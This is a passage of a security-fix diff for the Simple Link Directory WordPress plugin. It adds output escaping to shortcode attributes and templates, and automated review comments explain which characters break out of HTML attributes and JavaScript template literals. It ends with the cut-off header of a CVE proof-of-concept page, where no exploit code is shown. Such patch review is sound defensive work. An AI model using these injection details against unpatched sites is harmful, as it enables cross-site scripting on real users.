+    if (!get_option('sld_enable_top_part')) {
         update_option('sld_enable_top_part', 'on');
     }

-    if (!get_option('sld_enable_search')){
+    if (!get_option('sld_enable_search')) {
         update_option('sld_enable_search', 'on');
     }

-    if (!get_option('sld_enable_upvote')){
+    if (!get_option('sld_enable_upvote')) {
         update_option('sld_enable_upvote', 'on');
     }

 }

-function sld_activation_redirect( $plugin ) {
+function sld_activation_redirect($plugin)
+{

     $screen = get_current_screen();

-    if( ( isset( $screen->base ) && $screen->base == 'plugins' ) && $plugin == plugin_basename( __FILE__ ) ) {
-    //if( $plugin == plugin_basename( __FILE__ ) ) {
-        if( 'cli' !== php_sapi_name() ){
-            exit( wp_redirect( admin_url( 'edit.php?post_type=sld&page=sld_settings#help') ) );
+    if ((isset($screen->base) && $screen->base == 'plugins') && $plugin == plugin_basename(__FILE__)) {
+        //if( $plugin == plugin_basename( __FILE__ ) ) {
+        if ('cli' !== php_sapi_name()) {
+            exit(wp_redirect(admin_url('edit.php?post_type=sld&page=sld_settings#help')));
         }
     }
 }
-add_action( 'activated_plugin', 'sld_activation_redirect' );
+add_action('activated_plugin', 'sld_activation_redirect');


-if( function_exists('register_block_type') ){
-	function qcopd_sld_gutenberg_block() {
-	    require_once plugin_dir_path( __FILE__ ).'/gutenberg/sld-block/plugin.php';
-	}
-	add_action( 'init', 'qcopd_sld_gutenberg_block' );
+if (function_exists('register_block_type')) {
+    function qcopd_sld_gutenberg_block()
+    {
+        require_once plugin_dir_path(__FILE__) . '/gutenberg/sld-block/plugin.php';
+    }
+    add_action('init', 'qcopd_sld_gutenberg_block');
 }


 // Remove view from custom post type.
-add_filter( 'post_row_actions', 'qc_sld_remove_row_actions', 10, 1 );
-function qc_sld_remove_row_actions( $actions )
+add_filter('post_row_actions', 'qc_sld_remove_row_actions', 10, 1);
+function qc_sld_remove_row_actions($actions)
 {
-	if( get_post_type() === 'sld' ){
-	 unset( $actions['view'] );
-	}
-
-	return $actions;
+    if (get_post_type() === 'sld') {
+        unset($actions['view']);
+    }
+
+    return $actions;
 }
 // Remove view from taxonomies
-add_filter( 'sld_cat_row_actions', 'qc_sld_category_remove_row_actions', 10, 1 );
-function qc_sld_category_remove_row_actions($actions){
-	unset($actions['view']);
-	return $actions;
+add_filter('sld_cat_row_actions', 'qc_sld_category_remove_row_actions', 10, 1);
+function qc_sld_category_remove_row_actions($actions)
+{
+    unset($actions['view']);
+    return $actions;
 }

-if( is_admin() ){
+if (is_admin()) {
     require_once('class-plugin-deactivate-feedback.php');
-    $SlD_feedback = new SLD_Usage_Feedback( __FILE__, 'plugins@quantumcloud.com', false, true );
+    $SlD_feedback = new SLD_Usage_Feedback(__FILE__, 'plugins@quantumcloud.com', false, true);
 }

-function sld_remove_admin_menu_items() {
-    if( !current_user_can( 'edit_posts' ) ):
-        remove_menu_page( 'edit.php?post_type=sld' );
+function sld_remove_admin_menu_items()
+{
+    if (!current_user_can('edit_posts')):
+        remove_menu_page('edit.php?post_type=sld');
     endif;
 }
-add_action( 'admin_menu', 'sld_remove_admin_menu_items' );
+add_action('admin_menu', 'sld_remove_admin_menu_items');


-add_action( 'admin_notices', 'sld_wp_shortcode_notice',100 );
-function sld_wp_shortcode_notice(){
+add_action('admin_notices', 'sld_wp_shortcode_notice', 100);
+function sld_wp_shortcode_notice()
+{

     global $pagenow, $typenow;

-    if ( isset($typenow) && $typenow == 'sld'  ) {
-    ?>
+    if (isset($typenow) && $typenow == 'sld') {
+        ?>

         <!-- <div id="message-sld" class="notice notice-info is-dismissible"> -->
-            <?php
-            /*printf(
-                __('%s  %s  %s', 'dna88-wp-notice'),
-                '<a href="'.esc_url('https://www.quantumcloud.com/products/simple-link-directory/').'" target="_blank">',
-                '<img src="'.esc_url(QCOPD_ASSETS_URL).'/images/halloween25-sld.jpg" >',
-                '</a>'
-            );*/
+        <?php
+        /*printf(
+            __('%s  %s  %s', 'dna88-wp-notice'),
+            '<a href="'.esc_url('https://www.quantumcloud.com/products/simple-link-directory/').'" target="_blank">',
+            '<img src="'.esc_url(QCOPD_ASSETS_URL).'/images/halloween25-sld.jpg" >',
+            '</a>'
+        );*/

-            ?>
+        ?>
         <!-- </div> -->


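Review bot: `sld_plugin_loaded_fnc()` copies every key of the stored `option_tree` array into a top-level option with `update_option($key, $val)` and no whitelist, so any key that array happens to hold is promoted to a site option; restrict the loop to the plugin's own keys (for example `strpos($key, 'sld_') === 0`) before calling `update_option()`. The removal of the duplicate `qcsld_help_link_submenu()` is the one functional change in this hunk and is correct: it registered the identical `$submenu["edit.php?post_type=sld"][250]` entry that `qcopd_help_link_submenu()` already adds on the same hook and priority. Style points from the reformat: in `sld_meta_box_video()` the `// Priority of box in display order` comment now trails the closing `);` instead of the `'high'` argument it describes, and `qcld_sld_activate_callback($plugin)` names a parameter that `register_activation_hook` fills with the network-wide flag, not a plugin path.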
@@ -428,80 +461,91 @@
         </div>


-        <?php
-            $page_slug     = 'sld-demo-data';
+        <?php
+        $page_slug = 'sld-demo-data';

-            $existing_page = get_page_by_path( $page_slug );
-            if ( ! $existing_page ) {
-        ?>
+        $existing_page = get_page_by_path($page_slug);
+        if (!$existing_page) {
+            ?>

-        <div id="message" class="notice notice-info is-dismissible qcld-sld-demonotic-alart">
-            <p>
-                <?php
-                printf(
-                    __('%s Import SLD Demo Data:%s Imports a CSV file from the plugin folder into a custom post type called "sld", creates a new page, displays the data using a shortcode, and redirects the demo page %s Click to Import Data %s %s', 'qc-opd'),
-                    '<strong>',
-                    '</strong>',
-                    '<button type="button" id="sld-start-import-btn" class="button button-primary">',
-                    '</button>',
-                    '<div id="sld-import-message"></div>',
-
-                );
-                ?>
-            </p>
-        </div>
-    <?php }else{ ?>
+            <div id="message" class="notice notice-info is-dismissible qcld-sld-demonotic-alart">
+                <p>
+                    <?php
+                    printf(
+                        __('%s Import SLD Demo Data:%s Imports a CSV file from the plugin folder into a custom post type called "sld", creates a new page, displays the data using a shortcode, and redirects the demo page %s Click to Import Data %s %s', 'qc-opd'),
+                        '<strong>',
+                        '</strong>',
+                        '<button type="button" id="sld-start-import-btn" class="button button-primary">',
+                        '</button>',
+                        '<div id="sld-import-message"></div>',
+
+                    );
+                    ?>
+                </p>
+            </div>
+        <?php } else { ?>
+
+            <div id="message" class="notice notice-info is-dismissible qcld-sld-demonotic-alart">
+                <p>
+                    <?php
+                    printf(
+                        __('%s SLD Demo Data Imported:%s Imports a CSV file from the plugin folder into a custom post type called "sld", creates a new page, displays the data using a shortcode, and redirects the demo page %s Click to View Demo Page %s ', 'qc-opd'),
+                        '<strong>',
+                        '</strong>',
+                        '<a href="' . esc_url(home_url('sld-demo-data')) . '" target="_blank">',
+                        '</a>',
+
+                    );
+                    ?>
+                </p>
+            </div>
+        <?php } ?>

-        <div id="message" class="notice notice-info is-dismissible qcld-sld-demonotic-alart">
-            <p>
-                <?php
-                printf(
-                    __('%s SLD Demo Data Imported:%s Imports a CSV file from the plugin folder into a custom post type called "sld", creates a new page, displays the data using a shortcode, and redirects the demo page %s Click to View Demo Page %s ', 'qc-opd'),
-                    '<strong>',
-                    '</strong>',
-                    '<a href="'.esc_url(home_url('sld-demo-data')).'" target="_blank">',
-                    '</a>',
-
-                );
-                ?>
-            </p>
-        </div>
-    <?php } ?>

-
-        <div class="qcld-sldquick-flyout" >
+        <div class="qcld-sldquick-flyout">
             <div class="qcld-sldquick-flyout-items">
-                <a href="<?php echo esc_url('https://www.quantumcloud.com/resources/kb-sections/simple-link-directory/'); ?>" target="_blank" class="qcld-sldquick-flyout-button qcld-sldquick-flyout-item qcld-sldquick-flyout-premium" rel="noopener noreferrer" target="_blank" style="transition-delay: 0ms;">
+                <a href="<?php echo esc_url('https://www.quantumcloud.com/resources/kb-sections/simple-link-directory/'); ?>"
+                    target="_blank" class="qcld-sldquick-flyout-button qcld-sldquick-flyout-item qcld-sldquick-flyout-premium"
+                    rel="noopener noreferrer" target="_blank" style="transition-delay: 0ms;">
                     <div class="qcld-sldquick-flyout-label">
                         <div><?php echo esc_html('Getting Started', 'qc-opd'); ?></div>
                     </div>
                     <i class="dashicons dashicons-admin-home"></i>
                 </a>
-                <a href="<?php echo esc_url('https://www.quantumcloud.com/resources/kb-sections/frequently-asked-questions/'); ?>" target="_blank" class="qcld-sldquick-flyout-button qcld-sldquick-flyout-item" rel="noopener noreferrer" target="_blank" style="transition-delay: 60ms;">
+                <a href="<?php echo esc_url('https://www.quantumcloud.com/resources/kb-sections/frequently-asked-questions/'); ?>"
+                    target="_blank" class="qcld-sldquick-flyout-button qcld-sldquick-flyout-item" rel="noopener noreferrer"
+                    target="_blank" style="transition-delay: 60ms;">
                     <div class="qcld-sldquick-flyout-label">
                         <div><?php echo esc_html('FAQ', 'qc-opd'); ?></div>
                     </div>
                     <i class="dashicons dashicons-flag"></i>
                 </a>
-                <a href="<?php echo esc_url('https://www.quantumcloud.com/resources/kb-sections/simple-link-directory/'); ?>" target="_blank" class="qcld-sldquick-flyout-button qcld-sldquick-flyout-item" style="transition-delay: 90ms;">
+                <a href="<?php echo esc_url('https://www.quantumcloud.com/resources/kb-sections/simple-link-directory/'); ?>"
+                    target="_blank" class="qcld-sldquick-flyout-button qcld-sldquick-flyout-item"
+                    style="transition-delay: 90ms;">
                     <div class="qcld-sldquick-flyout-label">
                         <div><?php echo esc_html('Read the Documentation', 'qc-opd'); ?></div>
                     </div>
                     <i class="dashicons dashicons-sos"></i>
                 </a>
-                <a href="<?php echo esc_url('https://www.quantumcloud.com/resources/free-support/'); ?>" target="_blank" class="qcld-sldquick-flyout-button qcld-sldquick-flyout-item" rel="noopener noreferrer" target="_blank" style="transition-delay: 120ms;">
+                <a href="<?php echo esc_url('https://www.quantumcloud.com/resources/free-support/'); ?>" target="_blank"
+                    class="qcld-sldquick-flyout-button qcld-sldquick-flyout-item" rel="noopener noreferrer" target="_blank"
+                    style="transition-delay: 120ms;">
                     <div class="qcld-sldquick-flyout-label">
                         <div><?php echo esc_html('Ask for Help', 'qc-opd'); ?></div>
                     </div>
                     <i class="dashicons dashicons-email"></i>
-                </a>
-                <a href="<?php echo esc_url('https://dev.quantumcloud.com/sld/'); ?>" target="_blank" class="qcld-sldquick-flyout-button qcld-sldquick-flyout-item" style="transition-delay: 30ms;">
+                </a>
+                <a href="<?php echo esc_url('https://dev.quantumcloud.com/sld/'); ?>" target="_blank"
+                    class="qcld-sldquick-flyout-button qcld-sldquick-flyout-item" style="transition-delay: 30ms;">
                     <div class="qcld-sldquick-flyout-label">
                         <div><?php echo esc_html('Check out the SLD Demo', 'qc-opd'); ?></div>
                     </div>
                     <i class="dashicons dashicons-welcome-view-site"></i>
                 </a>
-                <a href="<?php echo esc_url('https://www.quantumcloud.com/products/simple-link-directory/'); ?>" target="_blank" class="qcld-sldquick-flyout-button qcld-sldquick-flyout-item qcld-sldquick-flyout-premium" rel="noopener noreferrer" target="_blank" style="transition-delay: 0ms;">
+                <a href="<?php echo esc_url('https://www.quantumcloud.com/products/simple-link-directory/'); ?>" target="_blank"
+                    class="qcld-sldquick-flyout-button qcld-sldquick-flyout-item qcld-sldquick-flyout-premium"
+                    rel="noopener noreferrer" target="_blank" style="transition-delay: 0ms;">
                     <div class="qcld-sldquick-flyout-label">
                         <div><?php echo esc_html('Upgrade to Premium', 'qc-opd'); ?></div>
                     </div>
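Review bot: after the reflow the `Getting Started`, `FAQ`, `Ask for Help` and `Upgrade to Premium` anchors still carry `target="_blank"` twice (once on the `<a href=...>` line and again just before `style=`), and the `Read the Documentation` anchor is the only `target="_blank"` link in the flyout without `rel="noopener noreferrer"`; drop the duplicate attribute and add the `rel` for consistency. Separately, the labels are emitted as `esc_html('Getting Started', 'qc-opd')`: `esc_html()` takes a single argument, so the text domain is ignored and these strings are never translated; `esc_html__('Getting Started', 'qc-opd')` is the function that escapes and translates.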
@@ -512,11 +556,11 @@
                 <div class="qcld-sldquick-flyout-label">
                     <div><?php echo esc_html('Start Here', 'qc-opd'); ?></div>
                 </div>
-                <img style="width:100%" src="<?php echo esc_url( QCOPD_IMG_URL . '/logo.png' ); ?>" alt="Dialogflow CX">
+                <img style="width:100%" src="<?php echo esc_url(QCOPD_IMG_URL . '/logo.png'); ?>" alt="Dialogflow CX">
             </a>
         </div>
-    <?php
-
+    <?php
+
     }

 }
 No newline at end of file
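Review bot: the `alt="Dialogflow CX"` on the SLD logo image inside the `Start Here` anchor reads as copy-paste residue from another product; the patch rewrites that line (spacing inside `esc_url()`) without touching the alt text, so change it to describe Simple Link Directory while the line is being edited.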
--- a/simple-link-directory/qc-op-directory-shortcodes.php
+++ b/simple-link-directory/qc-op-directory-shortcodes.php
@@ -113,35 +113,43 @@
 		), $atts
 	));

+	$title_font_size = preg_replace('/[^a-zA-Z0-9._%-]/', '', $title_font_size);
+	$subtitle_font_size = preg_replace('/[^a-zA-Z0-9._%-]/', '', $subtitle_font_size);
+	$title_line_height = preg_replace('/[^a-zA-Z0-9._%-]/', '', $title_line_height);
+	$subtitle_line_height = preg_replace('/[^a-zA-Z0-9._%-]/', '', $subtitle_line_height);
+	$min_width = preg_replace('/[^a-zA-Z0-9._%-]/', '', $min_width);
+
+
 	// check style if empty. default simple.
 	$style = ( isset( $atts["style"] ) && get_style_for_template( $atts["style"] ) ) ? get_style_for_template( $atts["style"] ) : $style;

 	//ShortCode Atts
 	$shortcodeAtts = array(
-		'orderby' 				=> $orderby,
-		'order' 				=> $order,
-		'mode' 					=> $mode,
-		'list_id' 				=> $list_id,
-		'column' 				=> $column,
-		'style' 				=> $style,
-		'min_width' 			=> $min_width,
-		'list_img' 				=> $list_img,
-		'search' 				=> $search,
-		'category' 				=> $category,
-		'upvote' 				=> $upvote,
-		'item_count' 			=> $item_count,
-		'top_area' 				=> $top_area,
-		'item_orderby' 			=> $item_orderby,
-		'item_order' 			=> $item_order,
-		'mask_url' 				=> $mask_url,
-		'enable_embedding' 		=> $enable_embedding,
-		'title_font_size' 		=> $title_font_size,
-		'subtitle_font_size' 	=> $subtitle_font_size,
-		'title_line_height' 	=> $title_line_height,
-		'subtitle_line_height' 	=> $subtitle_line_height,
-		'enable_image' 			=> $enable_image,
-		'dark_mode' 			=> $dark_mode,
+		'orderby' 				=> esc_attr($orderby),
+		'order' 				=> esc_attr($order),
+		'mode' 					=> esc_attr($mode),
+		'list_id' 				=> esc_attr($list_id),
+		'column' 				=> esc_attr($column),
+		'style' 				=> esc_attr($style),
+		'min_width' 			=> esc_attr($min_width),
+		'list_img' 				=> esc_attr($list_img),
+		'search' 				=> esc_attr($search),
+		'category' 				=> esc_attr($category),
+		'upvote' 				=> esc_attr($upvote),
+		'item_count' 			=> esc_attr($item_count),
+		'top_area' 				=> esc_attr($top_area),
+		'item_orderby' 			=> esc_attr($item_orderby),
+		'item_order' 			=> esc_attr($item_order),
+		'mask_url' 				=> esc_attr($mask_url),
+		'enable_embedding' 		=> esc_attr($enable_embedding),
+		'title_font_size' 		=> esc_attr($title_font_size),
+		'subtitle_font_size' 	=> esc_attr($subtitle_font_size),
+		'title_line_height' 	=> esc_attr($title_line_height),
+		'subtitle_line_height' 	=> esc_attr($subtitle_line_height),
+		'enable_image' 			=> esc_attr($enable_image),
+		'dark_mode' 			=> esc_attr($dark_mode),
 	);
+

 	$limit = -1;

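Review bot: the `esc_attr()` calls are applied while building `$shortcodeAtts`, that is at input time with every consumer outside this hunk, instead of at the point where each value is echoed. `esc_attr()` is only the right escaper for a double-quoted HTML attribute, so a template that emits one of these values inside a JS string or a URL gets the wrong encoding, one that already wraps it in `esc_attr()` at the echo site double-encodes it (`&amp;quot;`), and values such as `orderby`, `order`, `item_count` and `list_id` are, by name, query parameters where entity encoding has no meaning. The five `preg_replace('/[^a-zA-Z0-9._%-]/', '', ...)` lines are the part of this hunk that actually removes the break-out characters (`"`, space, `=`, `;`) from the CSS-length attributes; keep those, and move the `esc_attr()` calls to the echo sites in the templates.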
@@ -221,7 +229,7 @@
 			                        <span class="sld-theme-icon moon">🌙</span>
 			                    </div>
 			                </label>
-			                <em id="sld-theme-status-${index}">'.$lan_enable_dark_mode.'</em>
+			                <em id="sld-theme-status-${index}">'.esc_html($lan_enable_dark_mode).'</em>
 			            </div>
 			        `);
 			    }
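Review bot: `esc_html($lan_enable_dark_mode)` on the `<em id="sld-theme-status-${index}">` line is interpolated into a JavaScript template literal (backticks, `${index}`), and neither `esc_html()` nor `esc_js()` neutralises a backtick or a `${` sequence, so a translation containing either still terminates the literal or evaluates inside it. Apply `esc_html()` first (the literal becomes markup via jQuery), then pass the result through `wp_json_encode()` into a JS variable declared outside the template literal and interpolate that variable instead of the PHP string.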
@@ -242,14 +250,14 @@
 	                if (currentTheme === "dark-mode") {
 	                    $toggle.prop("checked", true);
 	                    sld_dark_light_mode($toggle);
-	                    $statusText.text("'.$lan_dark_mode_on.'");
+	                    $statusText.text("'.esc_js($lan_dark_mode_on).'");
 	                }
 	            } else {
 	                if (window.matchMedia("(prefers-color-scheme: dark)").matches) {
 	                    $body.addClass("dark-mode");
 	                    $toggle.prop("checked", true);
 	                    sld_remove_dark_mode($toggle);
-	                    $statusText.text("'.$lan_light_mode_on.'");
+	                    $statusText.text("'.esc_js($lan_light_mode_on).'");
 	                }
 	            }
             }
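Review bot: `esc_js()` on the `$statusText.text("...")` lines is used inside a `<script>` body assembled in a PHP string, but it is written for single-quoted strings in inline attribute handlers: it turns `"` into `&quot;` and `'` into `\'`, and a script block does not entity-decode, so a translation containing a double quote would display as the literal text `&quot;`. It does prevent the break-out, so this is a correctness rather than a security comment; `wp_json_encode($lan_dark_mode_on)` emitted without the surrounding quotes yields a proper JS string literal, and the same applies to the `$targetWraps.find("em").text(...)` hunk below.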
@@ -266,13 +274,13 @@
                     $body.addClass("dark-mode");
                     localStorage.setItem(storageKey, "dark-mode");
 			        sld_dark_light_mode($thisToggle);
-                    $targetWraps.find("em").text("'.$lan_dark_mode_on.'");
+                    $targetWraps.find("em").text("'.esc_js($lan_dark_mode_on).'");
 			    } else {
 			        // RESTORE ORIGINAL STYLE
                     $body.removeClass("dark-mode");
                     localStorage.setItem(storageKey, "light-mode");
 			        sld_remove_dark_mode($thisToggle);
-                    $targetWraps.find("em").text("'.$lan_light_mode_on.'");
+                    $targetWraps.find("em").text("'.esc_js($lan_light_mode_on).'");
 			    }
 			});

--- a/simple-link-directory/templates/simple/template.php
+++ b/simple-link-directory/templates/simple/template.php
@@ -90,13 +90,13 @@
 						foreach( $lists as $list ) :
 					?>

-					<li id="item-<?php echo get_the_ID() ."-". $count; ?>" style="<?php echo ( isset($list['list_item_bg_color']) && !empty($list['list_item_bg_color']) ) ? 'background:'. esc_attr($list['list_item_bg_color']) : ''; ?>">
+					<li id="item-<?php echo esc_attr(get_the_ID() ."-". $count); ?>" style="<?php echo ( isset($list['list_item_bg_color']) && !empty($list['list_item_bg_color']) ) ? 'background:'. esc_attr($list['list_item_bg_color']) : ''; ?>">
 						<?php
 							$item_url 	= isset( $list['qcopd_item_link'] ) ? esc_url($list['qcopd_item_link']) : '';
 							$masked_url = isset( $list['qcopd_item_link'] ) ? esc_url($list['qcopd_item_link']) : '';
 						?>
 						<!-- List Anchor -->
-						<a <?php if( $mask_url == 'on') { echo 'onclick="document.location.href = ''.$item_url.''; return false;"'; } ?> <?php echo (isset($list['qcopd_item_nofollow']) && $list['qcopd_item_nofollow'] == 1) ? 'rel="nofollow"' : ''; ?> href="<?php echo esc_url($masked_url); ?>"
+						<a <?php if( $mask_url == 'on') { echo 'onclick="document.location.href = '' . esc_js($item_url) . ''; return false;"'; } ?> <?php echo (isset($list['qcopd_item_nofollow']) && $list['qcopd_item_nofollow'] == 1) ? 'rel="nofollow"' : ''; ?> href="<?php echo esc_url($masked_url); ?>"
 							<?php echo (isset($list['qcopd_item_newtab']) && $list['qcopd_item_newtab'] == 1) ? 'target="_blank"' : ''; ?>>

 							<!-- Image, If Present -->
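Review bot: with `mask_url` on, the `onclick` and the `href` on this anchor carry the same value, because `$item_url` and `$masked_url` two lines above are both `esc_url($list['qcopd_item_link'])`; the mask hides nothing from the status bar or the page source. If masking is the intent, `href` needs a placeholder or redirect URL. The escaping chain itself is right: `esc_url()` encodes `'` as `&#039;` and `esc_js()` turns that back into `\'` for the single-quoted string inside the double-quoted `onclick`, which is exactly the context `esc_js()` is documented for.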
--- a/simple-link-directory/templates/style-1/template.php
+++ b/simple-link-directory/templates/style-1/template.php
@@ -155,7 +155,7 @@
 						}
 					?>

-					<li id="item-<?php echo get_the_ID() ."-". $count; ?>" style="<?php echo ( isset($list['list_item_bg_color']) && !empty($list['list_item_bg_color']) ) ? 'background:'. esc_attr($list['list_item_bg_color']) : ''; ?>">
+					<li id="item-<?php echo esc_attr(get_the_ID() ."-". $count); ?>" style="<?php echo ( isset($list['list_item_bg_color']) && !empty($list['list_item_bg_color']) ) ? 'background:'. esc_attr($list['list_item_bg_color']) : ''; ?>">
 						<?php
 							$item_url 	= isset( $list['qcopd_item_link'] ) ? esc_url($list['qcopd_item_link']) : '';
 							$masked_url = isset( $list['qcopd_item_link'] ) ? esc_url($list['qcopd_item_link']) : '';
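Review bot: this hunk only wraps the `<li id>` value in `esc_attr()`, while the next two lines define `$item_url`/`$masked_url` exactly as simple/template.php and style-16/template.php do, both of which also gained `esc_js()` on the anchor's `onclick` in this patch. If style-1 builds the same `onclick="document.location.href = ..."` attribute, that line needs the same change; if it does not, a one-line note in the commit saying so would save the next reviewer the check.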
--- a/simple-link-directory/templates/style-16/template.php
+++ b/simple-link-directory/templates/style-16/template.php
@@ -110,13 +110,13 @@
 						foreach( $lists as $list ) :
 					?>

-					<li id="item-<?php echo get_the_ID() ."-". $count; ?>" style="<?php echo ( isset($list['list_item_bg_color']) && !empty($list['list_item_bg_color']) ) ? 'background:'. esc_attr($list['list_item_bg_color']) : ''; ?>">
+					<li id="item-<?php echo esc_attr(get_the_ID() ."-". $count); ?>" style="<?php echo ( isset($list['list_item_bg_color']) && !empty($list['list_item_bg_color']) ) ? 'background:'. esc_attr($list['list_item_bg_color']) : ''; ?>">
 						<?php
 							$item_url 	= isset( $list['qcopd_item_link'] ) ? esc_url($list['qcopd_item_link']) : '';
 							$masked_url = isset( $list['qcopd_item_link'] ) ? esc_url($list['qcopd_item_link']) : '';
 						?>
 						<!-- List Anchor -->
-						<a <?php if( $mask_url == 'on') { echo 'onclick="document.location.href = ''.$item_url.''; return false;"'; } ?> <?php echo (isset($list['qcopd_item_nofollow']) && $list['qcopd_item_nofollow'] == 1) ? 'rel="nofollow"' : ''; ?> href="<?php echo esc_url($masked_url); ?>"
+						<a <?php if( $mask_url == 'on') { echo 'onclick="document.location.href = '' . esc_js($item_url) . ''; return false;"'; } ?> <?php echo (isset($list['qcopd_item_nofollow']) && $list['qcopd_item_nofollow'] == 1) ? 'rel="nofollow"' : ''; ?> href="<?php echo esc_url($masked_url); ?>"
 							<?php echo (isset($list['qcopd_item_newtab']) && $list['qcopd_item_newtab'] == 1) ? 'target="_blank"' : ''; ?>>

 							<?php if( isset($enable_image)  && $enable_image == "true" ) : ?>
@@ -145,7 +145,7 @@

 							<!-- upvote section -->
 							<div class="upvote-section">
-								<span data-post-id="<?php echo esc_attr(get_the_ID()); ?>" data-item-title="<?php echo ( isset($list['qcopd_item_title']) ? esc_html(trim($list['qcopd_item_title'])) : '' ); ?>" data-item-link="<?php echo ( isset($list['qcopd_item_link']) ? esc_url($list['qcopd_item_link']) : '' ); ?>" class="upvote-btn upvote-on">
+								<span data-post-id="<?php echo esc_attr(get_the_ID()); ?>" data-item-title="<?php echo ( isset($list['qcopd_item_title']) ? esc_attr(trim($list['qcopd_item_title'])) : '' ); ?>" data-item-link="<?php echo ( isset($list['qcopd_item_link']) ? esc_url($list['qcopd_item_link']) : '' ); ?>" class="upvote-btn upvote-on">
 									<i class="fa fa-thumbs-up"></i>
 								</span>
 								<span class="upvote-count">
--- a/simple-link-directory/templates/style-2/template.php
+++ b/simple-link-directory/templates/style-2/template.php
@@ -137,7 +137,7 @@

 							<!-- Link Text -->
 							<div class="ca-content">
-                                <h3 class="ca-main <?php echo $canContentClass; ?>">
+                                <h3 class="ca-main <?php echo esc_attr($canContentClass); ?>">
 								<?php
 									echo ( isset($list['qcopd_item_title']) ? esc_html(trim($list['qcopd_item_title'])) : '' );
 								?>
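Review bot: `esc_attr($canContentClass)` on the `<h3 class="ca-main ...">` line is correct as the output layer, but the variable is built outside this hunk and is a class name, so the stricter fix is `sanitize_html_class()` where it is assigned (letters, digits, `-` and `_` only; map it over each token if it holds several classes), with `esc_attr()` kept here.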
@@ -157,7 +157,7 @@

 							<!-- upvote section -->
 							<div class="upvote-section">
-								<span data-post-id="<?php echo esc_attr(get_the_ID()); ?>" data-item-title="<?php echo ( isset($list['qcopd_item_title']) ? esc_html(trim($list['qcopd_item_title'])) : '' ); ?>" data-item-link="<?php echo ( isset($list['qcopd_item_link']) ? esc_url($list['qcopd_item_link']) : '' ); ?>" class="upvote-btn upvote-on">
+								<span data-post-id="<?php echo esc_attr(get_the_ID()); ?>" data-item-title="<?php echo ( isset($list['qcopd_item_title']) ? esc_attr(trim($list['qcopd_item_title'])) : '' ); ?>" data-item-link="<?php echo ( isset($list['qcopd_item_link']) ? esc_url($list['qcopd_item_link']) : '' ); ?>" class="upvote-btn upvote-on">
 									<i class="fa fa-thumbs-up"></i>
 								</span>
 								<span class="upvote-count">
--- a/simple-link-directory/templates/style-3/template.php
+++ b/simple-link-directory/templates/style-3/template.php
@@ -129,7 +129,7 @@

 							<!-- Link Text -->
 							<div class="ca-content">
-                                <h3 class="ca-main <?php echo $canContentClass; ?>">
+                                <h3 class="ca-main <?php echo esc_attr($canContentClass); ?>">
 								<?php
 									echo ( isset($list['qcopd_item_title']) ? esc_html(trim($list['qcopd_item_title'])) : '' );
 								?>
@@ -149,7 +149,7 @@

 							<!-- upvote section -->
 							<div class="upvote-section">
-								<span data-post-id="<?php echo esc_attr(get_the_ID()); ?>" data-item-title="<?php echo ( isset($list['qcopd_item_title']) ? esc_html(trim($list['qcopd_item_title'])) : '' ); ?>" data-item-link="<?php echo ( isset($list['qcopd_item_link']) ? esc_url($list['qcopd_item_link']) : '' ); ?>" class="upvote-btn upvote-on">
+								<span data-post-id="<?php echo esc_attr(get_the_ID()); ?>" data-item-title="<?php echo ( isset($list['qcopd_item_title']) ? esc_attr(trim($list['qcopd_item_title'])) : '' ); ?>" data-item-link="<?php echo ( isset($list['qcopd_item_link']) ? esc_url($list['qcopd_item_link']) : '' ); ?>" class="upvote-btn upvote-on">
 									<i class="fa fa-thumbs-up"></i>
 								</span>
 								<span class="upvote-count">
--- a/simple-link-directory/templates/style-4/template.php
+++ b/simple-link-directory/templates/style-4/template.php
@@ -149,7 +149,7 @@

 							<!-- upvote section -->
 							<div class="upvote-section style-4-upvote-section">
-								<span data-post-id="<?php echo esc_attr(get_the_ID()); ?>" data-item-title="<?php echo ( isset($list['qcopd_item_title']) ? esc_html(trim($list['qcopd_item_title'])) : '' ); ?>" data-item-link="<?php echo ( isset($list['qcopd_item_link']) ? esc_url($list['qcopd_item_link']) : '' ); ?>" class="upvote-btn upvote-on">
+								<span data-post-id="<?php echo esc_attr(get_the_ID()); ?>" data-item-title="<?php echo ( isset($list['qcopd_item_title']) ? esc_attr(trim($list['qcopd_item_title'])) : '' ); ?>" data-item-link="<?php echo ( isset($list['qcopd_item_link']) ? esc_url($list['qcopd_item_link']) : '' ); ?>" class="upvote-btn upvote-on">
 									<i class="fa fa-thumbs-up"></i>
 								</span>
 								<span class="upvote-count">
--- a/simple-link-directory/templates/style-5/template.php
+++ b/simple-link-directory/templates/style-5/template.php
@@ -129,7 +129,7 @@

 							<!-- Link Text -->
 							<div class="ca-content">
-                                <h3 class="ca-main <?php echo $canContentClass; ?>">
+                                <h3 class="ca-main <?php echo esc_attr($canContentClass); ?>">
 								<?php
 									echo ( isset($list['qcopd_item_title']) ? esc_html(trim($list['qcopd_item_title'])) : '' );
 								?>
@@ -149,7 +149,7 @@

 							<!-- upvote section -->
 							<div class="upvote-section style-5-upvote-section">
-								<span data-post-id="<?php echo esc_attr(get_the_ID()); ?>" data-item-title="<?php echo ( isset($list['qcopd_item_title']) ? esc_html(trim($list['qcopd_item_title'])) : '' ); ?>" data-item-link="<?php echo ( isset($list['qcopd_item_link']) ? esc_url($list['qcopd_item_link']) : '' ); ?>" class="upvote-btn upvote-on">
+								<span data-post-id="<?php echo esc_attr(get_the_ID()); ?>" data-item-title="<?php echo ( isset($list['qcopd_item_title']) ? esc_attr(trim($list['qcopd_item_title'])) : '' ); ?>" data-item-link="<?php echo ( isset($list['qcopd_item_link']) ? esc_url($list['qcopd_item_link']) : '' ); ?>" class="upvote-btn upvote-on">
 									<i class="fa fa-thumbs-up"></i>
 								</span>
 								<span class="upvote-count">

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
